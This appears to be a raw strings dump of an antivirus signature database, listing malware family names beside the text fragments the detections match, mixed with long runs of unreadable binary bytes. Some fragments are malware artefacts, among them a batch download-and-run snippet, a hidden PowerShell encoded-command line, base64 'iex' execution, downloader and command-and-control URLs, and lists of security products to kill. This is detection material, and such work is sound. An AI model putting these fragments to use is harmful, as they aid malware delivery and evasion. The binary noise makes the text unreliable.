SHFOLDER.DLLSHGetFolderPathASHELL32.SHGetFolderPathASHGetFolderPathWSHELL32.SHGetFolderPathW m0v0~0 $ .textp cards.pdb ExitProcessKERNEL32.dllJc.a4 CARDS.DLL cdtAnimate cdtDraw cdtDrawExt cdtInit cdtTerm CARDS.DLLWEPcdtAnimatecdtDrawcdtDrawExtcdtInitcdtTerm U0^0g0p0y0 U0^0g0p0y0y MZ $ $*e Richn rtm.pdb 2MTR3 2MTR; 52MTRt 52MTR 2MTR9E RTM.DLL BestMatchInTable MgmGetFirstMfe MgmGetFirstMfeStats MgmGetMfe MgmGetMfeStats MgmGetNextMfe RtmBlockMethods RtmCloseEnumerationHandle RtmCreateNextHopEnum RtmCreateRouteList RtmDeleteRoute RtmGetChangeStatus RtmGetDestInfo RtmGetEntityInfo RtmGetEntityMethods RtmGetEnumDests RtmGetEnumNextHops RtmGetExactMatchDestination RtmGetLessSpecificDestination RtmGetListEnumRoutes RtmIsBestRoute RtmIsMarkedForChangeNotification RtmIsRoute RtmLockDestination RtmLockNextHop RtmReferenceHandles RtmReleaseEntityInfo SearchInTable RTM.DLLBestMatchInTableMgmGetFirstMfeMgmGetFirstMfeStatsMgmGetMfeMgmGetMfeStatsMgmGetNextMfeRtmBlockMethodsRtmCloseEnumerationHandleRtmCreateNextHopEnumRtmCreateRouteListRtmDeleteRouteRtmGetChangeStatusRtmGetDestInfoRtmGetEntityInfoRtmGetEntityMethodsRtmGetEnumDestsRtmGetEnumNextHopsRtmGetExactMatchDestinationRtmGetLessSpecificDestinationRtmGetListEnumRoutesRtmIsBestRouteRtmIsMarkedForChangeNotificationRtmIsRouteRtmLockDestinationRtmLockNextHopRtmReferenceHandlesRtmReleaseEntityInfoSearchInTabley MZ $ $*e @BLe.a RSDSM bad allocationRSDSM pid.pdb pid.pdb3 PID.DLL PID.DLLDllCanUnloadNowDllGetClassObject 0y MZ $ f8? blG k.\tB? BzP?u WY ? |Y7? )|Y7? * '? ;j |_? MP be.KM? ]r? ] \\as? \\as? U fg#eL? su? t > !); #& ?~? 1{jY? {(? 4 6>$5[? 79`d=? FawoK; 4[? U U? Rc y<k:? #?~? #?~? 1 144978cf6af9e0 144978cf6af9e0Flags1 !#Lua:FileSizeThreshold Lua:FileSizeGE186A0 !#ALF:Exploit:HTML/Banotty.BB!dha !#ALF:Exploit:HTML/Banotty.BB!dhaObMpAttributes SCPT:Bannoty.BB !#ALF:Exploit:Script/GetExchangeSID.A!dha !#ALF:Exploit:Script/GetExchangeSID.A!dhaObMpAttributes SCPT:GetExchangeSID 1d784af221cd 2178fe4d9b8f SIGATTR:deepemu 2a8939e0cc34 348975c03373 39955299f7dd FOPEX:VirTool:Win32/Obfuscator.AKN #FOPEX:VirTool:Win32/Obfuscator.AKN 3f78f652bd52 DGROUP 41899c60da49 4189c291d731 41b326adcd68 4289a29f9028 47781e904461 4db32a80c176 55b38b600507 6f7850781a44 9f7864186718 a778171962de c17817cec081 fab3818ac684 \\barco\\cmsclient\\ fc78cc311a27 6c61a2a87b0b 6c61a2a87b0bFlags1 PUA:Block:BitTorrent 10778196cd216 MpSimulateParanoid do_exhaustivehstr_rescan_Adrotator #do_exhaustivehstr_rescan_Adrotator 10b78d380addd 11478da2a68f4 11f7878cb48fe 1247893fc139c 197294da129d1 197294da129d1IncludesResearchData document.xml !#SLFPER:Dexphot.B installer_mi.exe 107f1e365595 35405dea4ee1 riched32.dll 42d7b0162804 4961e841b00d 517803bf61e8 5f78b5e4a883 7378a277a4a8 79d7f9a67207 7dd705adc670 8ed77125db2f 96d7e8242edc a1d77d51eea2 a1d7a8679949 a2d78ffe616c a9d73924c95e e1d768944fb2 e6d7aab68bc8 ecd7e1fc186e f9d76f063db2 ffd70d4f2c73 10b785922547b 11d78d7b31da4 19078350cb950 !#LUA:AutoItLargeFile cse?t r~0 {M r~0 {M7 c[-1& cS<.- cS<OV- !Ranky.HJ !Daonol.I !Slenfbot!inf !Slenfbot!inf\t@ Rogue:Win32/FakeRean!ZIP !Renos.X BrowserModifier:Win32/Sbrows.A info=%s POST /interface.asp HTTP/1.1 User-Agent: (CustomSpy) GET /qvod.txt HTTP/1.1 %s\\baidu %s\\baidu\\%s 0Projects\\xNetInstaller\\Release\\xNetInstaller.pdb !Small.MN !Daonol.J Killav.G !Adialer.H !Sirefef.A!dll pSystem\\Device\\__max++>%wZkernelbase.dllkernel32.dll !Vundo.gen!BQ CPM.dll CPM.dllas AVUK.dll AVUK.dlld 222.dll 222.dllDllCanUnloadNowDllGetClassObjectas] !Alureon.DA d.sys UACSRTOID OIDGMA T5_l] /uclk/knock.pl?bid= !Rustock.K !Wintrim.H !Renos.gen!BH H0&&_ !Harnig.EJ !Koobface.K !Vundo.MD hsuid=%s&cuid=%s&affid=%d&tid=%s&cver=%d&li=%d&bi=%d 8/pldr/test.jpgexplorer.exe LSDM_Mtx !Vundo.ME R\\Internet Explorer\\ieuser.exe -Embedding Zwscntfy.exewscntfy_mtxmrt.exeexplorer.exe S-1-1-0 S-1-16-4096 S-1-1-0S-1-16-4096] !Saddamme.0_2 !Coced.2_52 !Zimenok.0_5 !SCKeyLog S3F~: !Birdspy !JustJoke.12.A !Broomops.6_3 !Najort.1_4 $XzmP !Killfiles.BT !DNet ex]fi !Adroar.A !Fakeaol !Fakegina.A !Adload.BG BrowserModifier:Win32/Hijacker.F BrowserModifier:Win32/Hijacker.F @breakoff ifexist%temp%\\iexplorers.dllgotocon p\\software\\microsoft\\windows\\currentversion\\run 0%temp%\\iexplorer.exe 0start/low/miniexplore.exe\"http:// %ping% 0-n1-l1|find\"ttl\">nul Pfor/f\"tokens=3delims=:\"%%ein('%windir%\\system32\\ping.exe 0-n1-l1^|find.exe\"ttl\"') setpac=proxycfg !Killav.KP MonitoringTool:Win32/Xsmon !Killav.DN !Killav.DO \tWriteProcessMemory \tWriteProcessMemory] !Koobface.G !Koobface.L !Koobface.M !Wintrim.CB !Koobface.N !Koobface.O !Koobface.P !Koobface.R !Pushbot.NT !Small.ZZX !Daonol.K !Opachki.B !Oficla.G !Daonol.gen!A $$0$.F aAlureon.H ^juNa hTDLD !Alureon.DB tdl3desk tdl3desk] Trojan:SWF/Koobface.A !Cinmus.Y !Daonol.L !Hamweq.AK !Hamweq.AL !Rustock.L !Wintrim.I \tc#V| _k:xI{ !Koobface.S !Bredolab.AA @ /new/controller.php !Renos.gen!BI \\sshnas !Hamweq.AM !Harnig.EK !Pushbot.NU !Hamweq.AN !Hamweq.AO !Hamweq.AP !Hamweq.AQ !Hamweq.AR !Hamweq.AS !Hamweq.AT !Hamweq.AU !Hamweq.AV !Hamweq.AW !Hamweq.AX !Vundo.gen!BR 77.74.48.113 !Hamweq.BE !Hamweq.AY !Hamweq.AZ !Hamweq.BA !Hamweq.BB !Hamweq.BC <1>8m\\ !Hamweq.BD !Hamweq.BF !Hamweq.BG !Hamweq.BH !Alureon.DC H8SRT %s%s%x.tmp [%s] File download %s DownloadAndExecuteSoftString(%s) LiteLoader TDL Start Mutex detected MRS Loader was here... 224;new; 224;new;http:// !Hamweq.BO !Hamweq.BS !Hamweq.BT !Hamweq.BY !Hamweq.BZ !Hamweq.BI !Hamweq.BJ !Hamweq.BK !Hamweq.BL !Hamweq.BM !Hamweq.BN !Hamweq.BP !Hamweq.BQ !Hamweq.BR !Hamweq.BU !Hamweq.BV !Hamweq.BW !Hamweq.BX !Hamweq.CA !Hamweq.CB D57=] !Hamweq.CC !Hamweq.CD !Hamweq.CE !Hamweq.CF !Hamweq.CG !Pushbot.NV !Zlob.APT ,_AD1CompleteRemoveNow_ 0_browser_redirect_event_ j/get-last-update.php?sid=0&aid=0&said=0&pn=&config=cn (www.thenmnetwork.com] !Hamweq.CH !Hamweq.CI !Hamweq.CJ !Hamweq.CK !Hamweq.CL !Slenfbot.AID !Slenfbot.AIE !Unruy.D http://%s/dupe.php?q=%d.%d.%d.%d.%d.%s.1.%d +http://%s/dupe.php?q=%d.%d.%d.%d.%d.%s.1.%d faker_version is %d dtd_dll.dll addNumber dtd_dll.dllaaddNumber {FA531BC1-0497-11d3-A180-3339052286C3E} '{FA531BC1-0497-11d3-A180-3339052286C3E} \\acrotray .exe NetScheduleJobAdd %s.delme%u .megawebfind http://%s/banner3.php?q=%d.%d.%d.%d.%d.%s.1.%d.%d Global\\acrobat201 Global\\acrobat201] !Hamweq.CN !Hamweq.CO #e`@] !Hamweq.CP !Hamweq.CQ !Neeris.gen!D sysdrv32.sys Cache-Control: no-cache,no-store,max-age=0 Cache-Control: no-cache,no-store,max-age=0] !Renos.JW c u_{ HSTR:TrojanDownloader:Win32/Renos PLHSTR:TrojanDownloader:Win32/Renos rk'rGf &?`\\5 &?`\\56 6{suQH \\j3\t~( +A(cA N:};E4? &|4JY 1\\'AI# SK)]PZ iz@\"^ ,$o/R '+!-} &SRHP Ec8;e{ ST(W 7(:yyz dO vH 9+p|] n0Saw &nfRq rJ5&f $.~`gJ Smhni H=n:i y_\\JFT >syTup B~V`S Do9M_ >7n5= -F$(M L,s)A, hn`W{:_6 f\td70 , ]iPHRmK7Ub |GbNqNfD ej]j$ ?sE;t vGKJz }D0@1 Y6e'i jhl 3 Yma<| l^tAX ZmFr/ r.F*: \"t2]' ~?t.M E~uuogA2 %| a6B- 6M$'q y:SAP (q|EhL 4\"]cn R'nkm hsOaa p/'v4 (J!_e +JXrGu ^IO T5 *OmFZ V>.4( M}A8A 3-/55 3~-(d ~N0nH ;V+pD `Ceo< M>W`z \\_}?/ z?+9H 7vZcIcl f tmc> P=>G| w\t1$NW 2~mJ? mh+h >w6QN gh<@y 4|/ZT 2y5<C n<>}] ooz`s q/.Yl WVq>R pBOmq$ 9Q~}} MW3[k z%~~u [m^n3` A yb%a' {yZ.H l+6+q qM-O/ +]:NT %MNxE 3Bl1m^. :^m-ALu mJymq ]kW:{ EoVFiz %p[, 2 Y^?}w 5&Ban f\\Vm8 iqt+m pf68R C25>> 0m,Uk =Dd A V@)JI1 ~';w' Z.(uQ6 8il*25 ^QW_m 2Pt8Q ?o^]t n\\ f dWM|}T ~3)lI` ~. |uQ2 {|lt& jf%zxR (9|4+ >/)<b S'sqe 1Hu[r M/Ps+ <8@r6L{`5I- MSQm@K tI7d.S |!ix#K `:uqf cI\\k! w;(sz _D$j_ 56X|< \t$ e5 <n^8? F|;Fc zd\t_f^1 #\tQ'{ \\D K|f G'|Uh28 /KQ0EB 7c78ee7b44ef 7d78aaf37f74 7d78c034fec7 7d78f1e596f6 7d78f70590ab 7e613d762f69 7e780156fd2c 7e78129a5254 7e7861405030 7e7873f5ba7e 7e78d38be896 7f7825c22b33 7f7834a69609 7f7843231e58 7f78caa93035 7f78e0033e03 7f78e402afad 7f78f64011a4 8078059938e6 80786e38f5b8 8078c99d97d4 8078cd5a2b55 8078d703121d 8078fc87c663 817817bc158a 81781f4336f8 81783cb82a85 8178901dedc0 82614a476a7d 827833df6ab2 82784e73f147 8278731e16dc 837824634417 83784a328c46 83788eab5b3d 83789fae37b1 8378c76c9c8f 84780d8e395f 84786390e765 847870c68465 8478bfe3be7b 85787cecadab 8578ba9cd5fa 8661c9cdfc3a 8678106baf05 8678594e5500 8678ccd97801 8678d9cf81a2 8678fda84494 87780478c033 877857a7ee2e 877871de4792 8778a06f03ae 8778a909f88d 8778cac0770e 88615ed9e436 887857dd1536 88789e797f28 897832ac18d6 8a780061ae75 8a782f2fb836 8a786acaeddf 8a788a04c792 8a788a351d18 8a78e5ef2a37 8a78e9a0c386 8b78354e22b8 8b78596f901f 8b788a3d3a00 8b78b6cfa380 8c78c9fcab54 8c78e7967f93 8c78ff5fc6c1 8c8d6c0dcecd PUA:Block:KSRecorder.C 8d61b9887d15 netspy_qq netspy_msn netspy_ftp run netspy_mail \\pictp.jpg \\pictp.jpgxv !#ALF:Trojan:Win32/Nemty.PC!MTB VirtualProtectxv !#Trojan:Win32/RedFlare6.M!ibt Unsuccessful Successful runCommand initialize initializexv !#ALF:Trojan:Win32/Toolbar.Linkury.KA Smartbar MonetizationTools D:\\TFS\\Smartbar crdli !#HSTR:MSIL/Remcos.RR!MTB P !#HSTR:Trojan:Win32/Kolik.A \\Skype\\Skype.lnk URLDownloadToFileAxw !#ALF:Trojan:MSIL/Nanocore.SIB!MTB !#ALF:Trojan:Win64/Meterpreter.C PAYLOAD: PAYLOAD:xw !#ALF:Win32/Gracewire.SD!MTB !#HSTR:PossiblyClean:Win32/Spinnaker.CompanyName.A Spinnaker Software Solutionsxw !#HSTR:Program:Win32/ChecksDeepFreeze Checking if key exists HKLM SYSTEM\\CurrentControlSet\\services\\DeepFrz Checking if key exists HKLM SYSTEM\\CurrentControlSet\\services\\DeepFrzxw !#HSTR:Trojan:Win32/Predator1106!MTB !#HSTR:Win32/Meterpreter!CMD TPQQQAQIQQSQ !#HSTR:Win64/Meterpreter!CMD j YAP VPAPAPAPI !#Lowfi:HSTR:Win32/BrowseFox.J if(!window.blgcran){ window.blgcran = true; var scr=document.createElement(' if(!window.blgcran){ window.blgcran = true; var scr=document.createElement('xw !#Lowfi:HSTR:Win32/BrowseFox.P ForceRemove '{c3cbfe5d-53c1-44f9-8442-6faaf005aaa9}' = s 'See Results Hub' { ForceRemove '{c3cbfe5d-53c1-44f9-8442-6faaf005aaa9}' = s 'See Results Hub' {xw !#Lowfi:HSTR:Win32/InstallIQ.B Search Protector offer is disabled or not present. Skipping Search Protector Search Protector offer is disabled or not present. Skipping Search Protectorxw !#Lowfi:HSTR:Win32/JustPlugIt.C ForceRemove {F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5} = s 'TinyJSObject Class'xw !#FakeCert!SSLCO !#ALF:HSTR:WebBar WebBarViewModelSample _adlisting Unable to get adlistings.xw !#NativeAPIsInNonNativeApp ExAllocatePoolWithTag ExAllocatePoolWithTagxw !#HSTR:PWS:Win32/Sinowal.gen!Y.2 naghtmen ald.pdb ald.pdbxw !#ALF:Trojan:Win32/CryptInject.CA!MTB !#ALF:Trojan:Win32/Zbot.SIBE4!MTB !#HSTR:TrojanDownloader:Win32/Banload.BCA Tcnkewqed Tcnkewqedxw !#Exploit:Win32/BlofeldsCat.C!Lowfi jjjjjjh !#HSTR:Win32/ObfuscatorDynMemJmpAPI VirtualProtectxw !#HSTR:bot_sniffer {SNIFFER}: {KEYLOG}: Keylog Thread has been killed. Sniffer Thread activated. Sniffer Thread activated.xw !#ALF:PUA:Amonetize!bit !#ALF:Trojan:MSIL/Galaxian.A!dha Quasar.Common.<PrivateImplementationDetails> MinBer 2016 Zarber.Iner Zarber.Inerxw !#ALF:Trojan:Win32/GlassBadger.A!dha !#ALF:Trojan:Win32/Zbot.SIBE21!MTB !#SLF:Win32/Dogho.A sensepost/godoh/cmd.glob sensepost/godoh/dnsclient.Lookup sensepost/godoh/cmd.ini sensepost/godoh/cmd.inixw !#HSTR:Trojan:Win32/Tevebo.A!dha winmic svcname svcnameBOT 20A6668DBE1E9D09 RDTestVer RDTestVerxw !#HSTR:VirTool:Win32/Obfuscator.PN.5 !#ALF:Trojan:Win32/GuLoader.RH!MTB Hijackingen4 Myxobacteria9 Kastagnetterne Ransagningskendelser5 Ransagningskendelser5xw !#PUA:Block:TelamonBundler Software\\Telamon Offer_Yandex End Offer_Yandex Begin uidcreator.exe uidcreator.exexw !#TEL:Program:Win32/XTScanner.A!dha Tomcat 1qaz2wsx3edc http://%s:%d/manager/html http://%s:%d/manager/htmlxw !#ALF:Trojan:Win32/Spybot.RAS!MTB Libr3dy KERNEL32.E USER32.E GDI32.E hkkC[{; hkkC[{;xw !#Win32/AutoHotKey_HSTR1 \\AutoHotkey.chm by an AHK script >AUTOHOTKEY SCRIPT< http://ahkscript.org http://ahkscript.orgxw !#ALF:Trojan:MSIL/AgentTesla.GX!MTB G !#BM_VulnDriver.Gigabyte 0 f:\\ycc\\gdrv64\\objfre_wnet_AMD64\\amd64\\gdrv64.pdb \\DosDevices\\GIO \\Device\\GIO \\Device\\GIOxw !#HSTR:Trojan:Win32/BHO.F plugin Enable Browser Extensions Enable Browser Extensionsxw !#ALF:Ransom:Win32/BabukLocker.KK!MTB !#ALF:HackTool:MSIL/ReqAADRefreshToken!MTB RequestAADRefreshToken login.microsoftonline P3PHeader : P3PHeader :xx !#ALF:HSTR:Trojan:Win32/Nobandic.A !#ALF:HSTR:VirTool:MSIL/Injector.IA !#ALF:HSTR:Virtool:Win32/Obfuscator.APG !#ALF:MSIL/AgentTesla.SMK!MTB !#ALF:Trojan:MSIL/AgentTesla.BSO!MTB !#ALF:Trojan:Win32/Azorult.DS!MTB !#ALF:Trojan:Win32/Zbot.SIBD21!MTB !#ALF:Trojan:Win32/Zbot.SIBF!MTB !#ALF:TrojanDownloader/Win32:CannonFresco.A!dha mkdir %appdata%\\systemUpdating & powershell -w 1 -nologo -ec mkdir %appdata%\\systemUpdating & powershell -w 1 -nologo -ecxx !#HSTR:VirTool:MSIL/GeneralPacker.K part0 part1 part2 part3 !#HSTR:VirTool:Win32/GeneralPacker.S04 .-!_!-. !#LowAdware:Win32/Lollipop-stringdecryptor !#Lowfi:HSTR:Win32/Solimba.B \\Visual Studio 2010\\Projects\\installer4\\installer\\obj\\x86\\Release\\installer.pdb \\Visual Studio 2010\\Projects\\installer4\\installer\\obj\\x86\\Release\\installer.pdbxx !#Lowfi:HSTR:Win32/Vittalia C:\\Proyectos\\desktop_apps\\Updater\\UpdaterVittalia\\obj\\Release\\UpdaterService.pdb C:\\Proyectos\\desktop_apps\\Updater\\UpdaterVittalia\\obj\\Release\\UpdaterService.pdbxx !#Lowfi:HSTR:Win32/iBryte.F e:\\builddata\\Install\\source\\Min_Loader-BuildAndDeploy\\Release\\Loader_Resized.pdb e:\\builddata\\Install\\source\\Min_Loader-BuildAndDeploy\\Release\\Loader_Resized.pdbxx !#FakeCert!CMDCAL !#FakeCert!GlbSig !#HSTR:Backdoor:Win32/Senarw.S001 /gate/ _exec?command= !#HSTR:MSIL/Obfuscator.GenDecnryptAlgo.B !#HSTR:TrojanSpy:Win32/Nivdort.G2 !#VirTool:Win32/Obfuscator.XI !#HSTR:Nivdort.AG!Decrypt !#SLFPER:CobBeacon.Xor !#HSTR:Nivdort.DP!Decrypt !#ALF:HSTR:Trojan:Win32/CrypterDll.S01 Crypter ZLibEx Winapi.Windows AES_CTR AES_Encr !#ALF:Trojan:MSIL/AgentTesla.JNX!MTB $769b753c-436e-4588-a6a8-89ea6ac04a6e $769b753c-436e-4588-a6a8-89ea6ac04a6exx !#ALFPER:HSTR:AmonetizeDrop.A1 !#ALFPER:HSTR:Program:Win32/Xunpf.A viewweb.dll DllCmd viewweb.dllDllCmd !#HSTR:Program:Win32/Yandex Software\\Yandex\\YandexBrowser BrowserManager.pdb BrowserManager.pdbxx !#HSTR:Sindomorl.A3 !#HSTR:TrojanSpy:Win32/Xtrat!WriteFile !#LowfiHSTR:VirTool:Win32/Obfuscator.AEN !#TELPER:Trojan:MSIL/Munop.A!dha &\\CurrentVersion\\Runxx !#HSTR:Sindomorl.F1 D357D640 AE42E1153F04 D61624D430D74C36EC22xx !#HSTR:VirTool:Win32/DelfInject.gen!BF !#HSTR:CrossriderFramework AUICrossriderBHO@@ CLSID = s '{11111111-1111-1111 CurVer = s 'CrossriderApp CurVer = s 'CrossriderAppxx !#HSTR:Kanvas.A!sys MOSDEF_NET \\DosDevices\\mosdef \\rootkit\\kernelmode\\ \\rootkit\\kernelmode\\xx !#HSTR:Virtool:Killav %programfiles%\\avg panda avira grisoft norton avastxx !#TEL:Exploit:Win64/Abige.A!dha \\rundll32_getadmin\\Add\\ password may Error please check again AddByGod AddByGodxx !#HSTR:Worm:Win32/Vobfus.DA!CLSIDReference VB.DirListBox VB.Timer VB.Timerxx !#TEL:Trojan:MSIL/AgentTesla.VV!MTB H !#HSTR:CeeInject.Miuref !#HSTR:Virus:Win64/Viknok.gen!E !#BM_AT_cry:GenericNirSoft /savelangfile /scomma &Copy Selected Items &Copy Selected Itemsxx !#OFN:NtdsAudit Release\\NtdsAudit.pdb --pwdump <file> --history-hashes --dump-reversible <file> --dump-reversible <file>xy !#ALF:Trojan:MSIL/AgentTesla.TWL!MTB !#ALF:Trojan:Win32/Ursnif.BI!MTB !#HSTR:Ropest_StringDecryptionx64 !#HSTR:Virus:Win32/Expiro.AK !#HSTR:WindowsInstaller3_1.A \"WindowsInstaller3_1\\WindowsInstaller-KBxy !#Lowfi:HSTR:Win32/Kuaiwan /pc.gif?a=update&m=soft&did=%s&appid=1700&verid=%s&pid=%s&step=%d&overid=%d&url=%s /pc.gif?a=update&m=soft&did=%s&appid=1700&verid=%s&pid=%s&step=%d&overid=%d&url=%sxy !#Lowfi:HSTR:Win32/PastaLeads https://' : 'http://') + 'nps.pastaleads.com/npsb/logic.js?originid=${ORIGIN_ID https://' : 'http://') + 'nps.pastaleads.com/npsb/logic.js?originid=${ORIGIN_IDxy !#HSTR:VirTool:Win32/Obfuscator.ACG !#HSTR:Win32/Trickbot.1 1%OB{xLuJ}O$d~Cd#vT}Pmd~rW5$?0JR2U1hq0Z1 1%OB{xLuJ}O$d~Cd#vT}Pmd~rW5$?0JR2U1hq0Z1xy !#HSTR:Wobeefac.A storage.googleapis.com/facewebs/machine facewebs/machine .exeopen !#HSTR:Trojan:Win32/Zlob.gen!K.2 !#HSTR:TrojanDropper:Win32/Sirefef.gen!D !#PUA:Block:SquareNet \\download_mgr_photoyee\\Release Release\\toolbar_setup.pdb Release\\tb_setup_zip.pdb Release\\tb_setup_zip.pdbxy !#HSTR:Backdoor:Win32/Temsidavi SetTime [-]NTTime SetTime[-]NTTime !#HSTR:Win32/Meterpreter!ws2_32 hws2_T h32hws2_T fh32hws2_T =23_2u WS2_32 WS2_32[ ws2_32[ !#TEL:Trojan:Win32/CoinLoader.SN!MTB !#ALF:Trojan:Win64/Dridex.GM!MTB !#HSTR:PhanEvade3.x64.DlDll !#HSTR:Program:Win32/ZeoSpace bin\\Release\\Win32\\ZeoNetInstallerBA.pdb ZeoSpace - Installxy !#HSTR:Trojan:Win32/Beebfus.A !#HSTR:TrojanDownloader:Win32/Adload.BO /update.php?v=xy !#HSTR:TrojanDownloader:Win32/Delf.CI porn.com Portions Copyright (c) 1999,2003 Avenger by NhT /Portions Copyright (c) 1999,2003 Avenger by NhTxy !#Trojan:MSIL/CryptInject.PG!MTB !#ALF:Trojan:Win32/Flatterly.B!dha Start DNS Func Send Request To domain : Faild send Data To domain : Faild send Data To domain : xy !#HSTR:TSPY:Hesperbot.A2 hEw7' !#Lowfi:HSTR:Trojan:Pintole NSS_Initialize 0secmod.db !#TEL:Trojan:Win32/Songstress.A!dha tmy.f iskander.pdb iskander.pdbxy textlinks@lplay.com lp_config_thread_mtx LivingPlay Games cf.livingplay.com cf.livingplay.comxy !#Lowfi:HSTR:Rapzo set_kbHook get_WebcamClient get_SendFileClient CommandPromptPacket get_Devices get_Devicesxy !#VirTool:Win32/Obfuscator.XTEA !#ALFPER:HSTR:Win32.SuspiciousInstaller.S01 {cid} {net} {db}{wv}{sb}{cid}{net} ChromeHTMLxy !#HSTR:Base64InvExpr ::FromBase64String( iex(xy iSvc2.dll \\iSafe\\trunk\\bin\\iSafeSvc2.pdb runiSvc2.dllxy !#TEL:HackTool:Win32/GDad_Network_hstr.A!dha Network.dll !#TEL:Win32/SuspApphelp.A ApphelpCheckMsiPackage ApphelpFixMsiPackage ApphelpFixMsiPackagexy !#Trojan:MSIL/Razy.MR2!MTB \\brave\\Preferences bBrave #RANDOM_NAME#xy !#ALF:Ransom:Win32/FileCryptor.L!MTB erawosnar .sick FileName.txt what you want from your victim what you want from your victimxy GamevanceText.Linker.1 data.5threvolution.com Software\\gvtlxy !#ALF:HackTool:Win32/Nosogo.F!dha search_forbidden.exe.manifest remove_forbidden.exe.manifest PYZ.pyz PYZ.pyzxy !#ALF:Trojan:Win32/Slunker.A!dha [+]write success [+]load success [-]load failed [-]write failed[%d] [-]write failed[%d]xy !#HSTR:Backdoor:MSIL/Hammertoss.A!dha tDiscoverer.exe READYSTATE_INTERACTIVE IWebBrowserApp CallSite CallSitexy !#Ransom:Win32/SodinokibiCrypt.SL!MTB /bin/%a*sh 15b358b6a917 15b35abef2b7 15b360b493c7 15b377deaf1b 15b37db1a37f 15b38c3b6215 15b38ce711aa 15b391e22112 15b3b6ed70da 15b3bc827cbe 15b3c12fb0a1 15b3c49e8f1e 15b3d007c5f9 15b3db1f2c51 15b3db78cabd 15b3dc2a8019 15b3e45ddc2d 15b3fb25d1d1 25b3302a548d 25b3e06fe6ba 25b3f6cc4ddf 32b3becef1f2 45b33230162f 55b3dade899a 2db346333d96 2db346333d96IncludesResearchData T1070.004 73b32afc7f81 73b32afc7f81IncludesResearchData T1070.006 43b3fc994a74 43b3fc994a74IncludesBMLuaLib 60b358a8aaa7 60b358a8aaa7IncludesBMLuaLib 26eb342ae35af /logrotate 2a1b33d0da295 2a1b33d0da295IncludesBMLuaLib,ResearchData 8bb3f12f1a64 20db3e68bbfed 20db3e68bbfedIncludesResearchData GrubTampering.A isRebootDangerous T1561.002 Impact 7db3510b66c5 41b30d591403 .config/autostart 9bb3d39dddaa \t!EF@ 45b3a8e1c3a5 45b3a8e1c3a5IncludesResearchData T1190 webserver_childproc 77b32f8d41b7 %d+%.%d+%.%d+%.%d+ 69b38d3c0ac1 69b38d3c0ac1IncludesResearchData 41b3c79c6f19 19b329cb4fc6 2ebb32d3e9e6a 2ebb32d3e9e6aIncludesBMLuaLib,ResearchData 88b39dab5b1a docker_start /([0-9a-f]+)/hosts$ 51b3567b152a V2k7R .kUl227x~ ; eTM 4V7&B hJ Uy zk8I^ Jn() snRt7 / 1B~D eTl;V ~o<=Z )zF|h@&2 _s64U,h /N*3'I8|? /W]vt TGu07 /zp>'m hEgY,ZaU& [7ij$ /b!{/u xf.d\\ |n\\ng -tqys Pv7bh ~\"6iV{ WI.)Uk-e !9\\[k# rwQH frR = 0S]G6 0S]G6/ 0r1<^ 0uZgg pZff~ 0u|PTo K[\\aS \ti MZ ry&XK QB*k= |u\"F$ 06~ ~ 1N7H; d:UyV eTBE[ op_oc TaVgk &)r\tA !Renos.PH !Rorpian.A !Rorpian.B !Rorpian.gen!A myporno.avi.lnk pornmovs.lnk setup%u.fon aff_%u.dll setup%u.lnk Sending exploit to %s from %s downloadedav !Alureon.gen!Y !Adload.CH BrowserModifier:VBS/Startpage.A !Rorpian _<\tY~ !Small.gen!BJ !Small.TQ !Pushbot.UV !Chepvil.J bpsv6g !Chepvil.I !Agent.ABHN !Killav.FI !Agent.ABHP !Dofoil.D !Dofoil.D-@ j@OoF [~c<> .+:\\\\aw1\\\\Etmscztha.vbp !Rorpian.C !Rorpian.D Killav.AV c:cd\\arquiv~1ifnotexistavg\\avgupd.*gotosgndvrfc 1c:cd\\arquiv~1ifnotexistavg\\avgupd.*gotosgndvrfc !Alureon.EV !Killav.FY MonitoringTool:Win32/Starlogger Bsoft\\Windows\\CurrentVersion\\App Management\\ARPCache\\StarLogger_is1 Run StarLogger [left windows] #Desktop will be captured regularly. !Pushbot.UW !Renos.PI \tINFECTED] !Agent.QE \\inetc.dll/end\\bundle.exehttp://.zdropp.co.cc/download.php?token= C\\inetc.dll/end\\bundle.exehttp://.zdropp.co.cc/download.php?token= \\inetc.dll/end\\bundle.exehttp:// W\\inetc.dll/end\\bundle.exehttp:// .uz4. /exe/ 0/bundle.exe/silentget\"\\bundle.exe\" \\inetc.dll .wgett.co.cc/ token= .exe\" /S .exe\" /Sx #\\OfferBox\\config.xml /trackstats.php id=1&token= /trackstats.phpid=1&token= \\OB.exe \\count_total.txt \\count_total.txthttp: .uz4.net/log34756.php .uz4.net/log34756.php] !Alureon.gen!Z !Renos.PJ !Rorpian.E /`2>g WGDAs !Rorpian.E!inf shell\\explore\\command=rundll32.exesetup 7shell\\explore\\command=rundll32.exesetup !Rorpian.E!lnk rundll32.exesetup Hrundll32.exesetup .fon, 0-9a-f!%systemroot%\\system32\\shell32.dll% !Renos.PK !Agent.PJ !Vundo.NX !Renos.PL !Adload.CI jpdesk_ /dlcall !Renos.PM software\\microsoft\\ 0)software\\microsoft\\ a-z0-9 !Pushbot.UX !Agent.ABHQ _lSrI !Adload.CJ !Pushbot.UY !Pushbot.UZ !Adload.CK !Agent.ABGB !Renos.PN !Ldpinch.CQ gJn_34287568_T7DD atuando.php C:\\systeam\\javaupdate .to//cdmod.html .to//cdmod.html] !Vundo.NY !Vundo.NZ !Vundo.gen!AW !Agent.ABHR !Adload.CL !Alureon.gen!AA Trojan:Win64/Alureon.gen!C CDf9E Trojan:Win64/Alureon.gen!D DownloadToFS DownloadToFS] !Hamweq.DR !Renos.PO !Alureon.gen!M !Alureon.EX .php?i= 10..php?i= &f=0&x64=0&os= &elevated=0 !Rorpian.F Trojan:Win64/Alureon ( <Qq\\ BrowserModifier:VBS/Startpage.B !Alureon.EY TrojanDownloader:HTML/Renos.gen!E !TrojanDownloader:HTML/Renos.gen!E imgonmouseover=\"window.status='downloadstreamingplayermediaplease!';\"alt=\"updateflashpluginplease!\"src=\" jimgonmouseover=\"window.status='downloadstreamingplayermediaplease!';\"alt=\"updateflashpluginplease!\"src=\" !Dofoil !DofoilT@ @JhE4as )k^Xh k^Xhg ($5Mb~ Q+7@b~ QFR[B! QFR[B!b~ Sf\" @yu \\smss.exe_ \\csrss.exe_ \\ctfmon.exe_ \\dxdiag.exe_ \\gefreg.exe_ \\lxdiag.exe] !Killav.FM ravmondsfctlcommpmontwister !Rorpian.G !Bredolab.AG !Renos.PP !Chepvil.K /f/g.php !Chepvil.L !Small.TS HWindows Help Engine application file Content-Type:multipart/form-data; boundary=77fcd2ncos33a816d302b6 /install.asp /install.asp] 